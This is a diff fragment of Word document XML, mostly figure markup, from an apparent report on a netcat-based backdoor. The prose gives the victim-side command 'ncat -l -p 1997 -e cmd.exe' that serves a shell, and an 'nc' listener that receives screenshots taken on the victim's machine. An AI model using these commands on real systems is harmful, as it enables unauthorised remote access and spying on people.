+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>2</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. The </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Client</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="3CBEEE8C" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:377.45pt;margin-top:311.15pt;width:428.65pt;height:263.8pt;z-index:251661312;visibility:visible;mso-wrap-style:none;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A517E9" wp14:editId="53AE60AF">
+                            <wp:extent cx="5715000" cy="3013710"/>
+                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                            <wp:docPr id="43" name="Picture 43"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 3"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId9">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5715000" cy="3013710"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>2</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. The </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Client</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The image show in figure 1 depicts the program that serves as the bridge between the victim and the attacker. Here, the program executes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>ncat.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with the command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>l -p 1997 -v -e cmd.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which basically creates a netcat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which listens for incoming connections.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The image shown in figure 2 depicts the command line window interface shown to the user in the attacker’s end of the line. Here, the attacker is shown what options he can execute while the ncat server is up and running on the victim’s machine. It would be quite important to note that if the attacker desires to obtain files from the remote machine he would have to launch a backdoor console using the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>-c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> relay the needed commands to the other end to complete the transfer. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27856AE5" wp14:editId="623BD436">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>right</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>333643</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5443855" cy="3440430"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="26670"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="6" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5443855" cy="3441032"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E68D178" wp14:editId="3D0DC91E">
+                                  <wp:extent cx="5937885" cy="3098165"/>
+                                  <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
+                                  <wp:docPr id="44" name="Picture 44"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 4"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId10">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5937885" cy="3098165"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>3</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Taking Screenshots</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="27856AE5" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:377.45pt;margin-top:26.25pt;width:428.65pt;height:270.9pt;z-index:251663360;visibility:visible;mso-wrap-style:none;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E68D178" wp14:editId="3D0DC91E">
+                            <wp:extent cx="5937885" cy="3098165"/>
+                            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
+                            <wp:docPr id="44" name="Picture 44"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 4"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId10">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5937885" cy="3098165"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>3</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Taking Screenshots</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 3 shows how the attacker can begin receiving screenshots from the remote host. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Entering the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>-s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command from the client will run the command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>nc -v -l -p 1997 &gt; screen_capture.png</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which, in turn, would initialize a netcat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">listener </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for connections that are sending a file of type </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">portable network graphic. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>This would also create a local image file of the same type which would serve as the container of the file to be received from the remote host.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="593A0753" wp14:editId="19368622">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>left</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>-301</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5443855" cy="3458845"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="27305"/>
+                <wp:wrapNone/>
+                <wp:docPr id="12" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5443855" cy="3458845"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B3064F" wp14:editId="2971B1EB">
+                                  <wp:extent cx="5937885" cy="3115945"/>
+                                  <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
+                                  <wp:docPr id="45" name="Picture 45"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
